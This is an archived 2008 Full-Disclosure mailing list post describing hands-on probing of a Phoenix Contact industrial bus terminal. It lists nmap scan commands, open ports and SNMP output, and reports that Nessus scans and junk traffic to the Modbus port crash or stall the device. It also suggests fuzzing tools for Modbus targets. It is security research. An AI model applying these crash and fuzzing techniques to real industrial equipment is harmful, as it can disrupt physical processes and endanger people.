OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: [Full-disclosure] scada/plc gear

From: gmaggro (gmaggrorogers.com)
Date: Tue Jan 15 2008 - 12:04:49 CST


The Phoenix Contact 'FL IL 24 BK-PAC' arrived the other day. It is a
wonderfully German piece of DIN rail
(http://www3.telus.net/public/dt0116/items/dinrails.jpg) gear:

http://eshop.phoenixcontact.com/phoenix/images/productimages/large/20260_1000_int_04.jpg
http://eshop.phoenixcontact.com/phoenix/treeViewClick.do?UID=2862314

There is a two digit LED display on it, with a reset button underneath.
As soon as I saw that, I figured stability would be an issue. This
turned out to be a correct assumption. While the most agressive of nmap
scans did not lock it up for me, Nessus (with everything enabled) did
every time. Normally the display reads '82' but when it goes south it
reads '88'.

In any case, nmap -TUVRC -p1-65535 shows TCP 80, 502, 1962 open along
with UDP 7, 161, 199, 1059, and 5500. Very interesting stuff. I've had
many dealings with networks of hundreds of thousands to millions of
nodes, and though the reasonable explanation is that I've forgotten it,
I don't ever recall seeing 1962/tcp and 5500/udp open. MAC prefix is
00:A0:45 (Phoenix Contact Gmbh & CO.). OS details, well... I severely
doubt this is a 3COM lan modem or Dell laser printer.

Hitting just 502 with crud caused it to stop responding within 10-30
seconds, but after a similarly short interval, 502 started responding again.

snmpwalking it gives a sysDescr of "Ethernet bus terminal", a sysName of
"FL IL 24 BK" and the ifDescr say "NET+ARM 10/100 Megabit Ethernet
Driver by NETSilicon" and "pNA+ Loopback Driver".

80 says "NET+ARM Web Server/1.00", and feels pretty snappy. The web
page, in addition to configuration options, also supplies a wiring
diagram and a mock-up the faceplate with status LEDs, and other
reference information (status codes, etc).

Reading through the manual/PDFs for this device indicates that it uses
Interbus protocol, which has since been subsumed into something called
Profinet. Awesome - something new to explore.

I'd recommend picking up a FLIL24BK since it runs quite the profile of
interesting stuff in addition to modbus. I don't get why echo is there,
unless the developers thought it would serve as some kind of diagnostic
facility. It also responds quite differently to the mbread (from the
modbus-0.9 package) command.

-----------------------------

I was made aware of an interesting and easy-to-use fuzzing program that
contains modbus testing functionality:
http://www.beyondsecurity.com/bestorm_overview.html

Now it's too expensive for individual purchase (it appears to be geared
towards businesses) but they have a 30 minute time limited demo that is
quite functional. It's windows only. Someone might find it valuable to
fire it up against a modbus target, along with a sniffer to see what's
going on. For beginners or GUI only folks, it would make a great
introduction.

Scapy (http://www.secdev.org/projects/scapy/) is proving a nice &
powerful framework for mucking around. It has a 'fuzz' command which,
though simple, ought to be enough to construct some very handy stuff.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/